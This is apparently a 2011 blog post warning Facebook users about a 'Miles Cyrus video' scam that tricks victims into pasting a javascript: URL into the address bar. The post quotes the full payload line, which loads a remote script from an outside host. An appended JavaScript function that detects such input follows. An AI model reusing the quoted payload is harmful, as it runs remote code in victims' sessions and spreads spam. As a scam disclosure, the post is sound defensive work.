Thursday, November 10, 2011

Miles Cyrus Facebook Scam

BACKGROUND
If you see your wall or your news stream on Facebook filled with updates from friends about a so-called Miles Cyrus video, it means your friends have fallen victim to this new widget exploit on Facebook. Please resist the temptation to follow the link unless you want to be victimized as well. I hope this is brought to Facebook's attention so that they can stop it immediately.

DETAILS
[Image: A stream of Facebook wall posts]
Seeing this stream of posts from your friends on your wall might spark your interest in following the links. But to experienced (or somewhat paranoid) eyes this looks suspicious. As you can see, two of them have the same caption word for word, even down to the capitalization.

So, just to confirm my doubts about these posts, I decided to follow the link. After clicking it I was redirected to a fan page with an embedded video, where I was supposed to verify that I am over 18. At this point I was convinced there was something fishy going on, because as far as I know Facebook does not allow mature content on its site, as its Terms and Conditions state. (Yes, I bothered to read all of that.)

To see what this widget was up to, I clicked the Continue button to "verify" that I am over 18. After clicking Continue I was given a set of instructions: click the address bar, type j, and then press Ctrl+V. Say what? Ctrl+V? As I am quite fond of keyboard shortcuts, I am well aware that it is the shortcut for pasting. This widget was really up to no good. Imagine: the widget has access to your clipboard.

I did as instructed: click the address bar (which selects everything written in it), type J (which overwrites whatever address was there), and then press Ctrl+V (which pastes something into the address bar, appended to the "J"). In this case the text appended to "J" was "avascript:(a=(b=document).createElement('script')).src='http://saudau.vn/1/ro.js',b.body.appendChild(a);void(0)". This line clearly shows that you are about to execute an offsite JavaScript file when you press Enter, which is also part of the instructions. After following all of these instructions you are shown a dead-end page saying there are no surveys available for your country. So this is really about surveys, not about the video.

But wait, there's more. The widget has a further payload in the offsite JavaScript: the script also posts to the walls of random people on your friends list. So it was also trying to spread itself by abusing the trust your friends have in you. I accessed the JavaScript code this scam executes and found that it uses five fake Miles Cyrus fan pages with the same malicious content. The fan page IDs of these pages are 188909304525633, 180090332077859, 234590593270237, 188127947936748 and 136489769788481. Spread the word to your friends and report this to Facebook so that they can stop this malicious widget.
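The "type j, then Ctrl+V" trick described above can be checked mechanically. The following is an added example, not code from the original post: it reconstructs what ends up in the address bar from the typed prefix and the pasted text, decides whether the result is a javascript: URL, and extracts the offsite scripts it would load. The function names are my own; the clipboard string is the payload quoted in the post.

```javascript
// Added example, not code from the original post. It reconstructs the string
// the scam leaves in the address bar ("type j, then Ctrl+V") and classifies it
// the way a defensive address-bar filter would. Function names are my own;
// the clipboard text below is the payload quoted in the post.

// What the scam's page placed on the clipboard (as quoted above).
const SCAM_CLIPBOARD_TEXT =
  "avascript:(a=(b=document).createElement('script'))" +
  ".src='http://saudau.vn/1/ro.js',b.body.appendChild(a);void(0)";

// Join what the user typed with what was pasted, then decide whether the
// result is a javascript: URL and which offsite scripts it would load.
function analyseAddressBarInput(typedPrefix, pastedText) {
  const raw = typedPrefix + pastedText;
  // Browsers drop tabs/newlines and ignore case when parsing a scheme, so
  // normalise the same way before comparing the first 11 characters.
  const scheme = raw.replace(/[\t\r\n ]/g, '').slice(0, 11).toLowerCase();
  const isJavascriptUri = scheme === 'javascript:';

  // Every `.src='...'` or `.src="..."` assignment is an external script load.
  const sources = [];
  const srcPattern = /\.src\s*=\s*(['"])(.*?)\1/g;
  let match;
  while ((match = srcPattern.exec(raw)) !== null) sources.push(match[2]);

  // Reduce the script URLs to hostnames so they can be matched against a
  // blocklist or logged as indicators.
  const hosts = [];
  for (const u of sources) {
    try { hosts.push(new URL(u).hostname); } catch (e) { /* not a full URL */ }
  }

  let verdict = 'not a javascript: url';
  if (isJavascriptUri) {
    verdict = sources.length > 0
      ? 'self-xss: javascript: url loading an offsite script'
      : 'self-xss: javascript: url with inline code';
  }
  return { isJavascriptUri, sources, hosts, verdict };
}
```

Note that the clipboard text on its own is not flagged, because it does not start with `javascript:`; the `j` the victim types is what completes the scheme, so a check that only inspects pasted clipboard text would miss it, and the check has to run on the final address-bar contents.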


[Image: One of the fan pages linked by the wall posts]
[Image: Instructions shown after clicking Continue]
[Image: A JavaScript call being inserted in the address line]
[Image: The dead-end page]
[Image: The contents of ro.js, the offsite JavaScript being executed]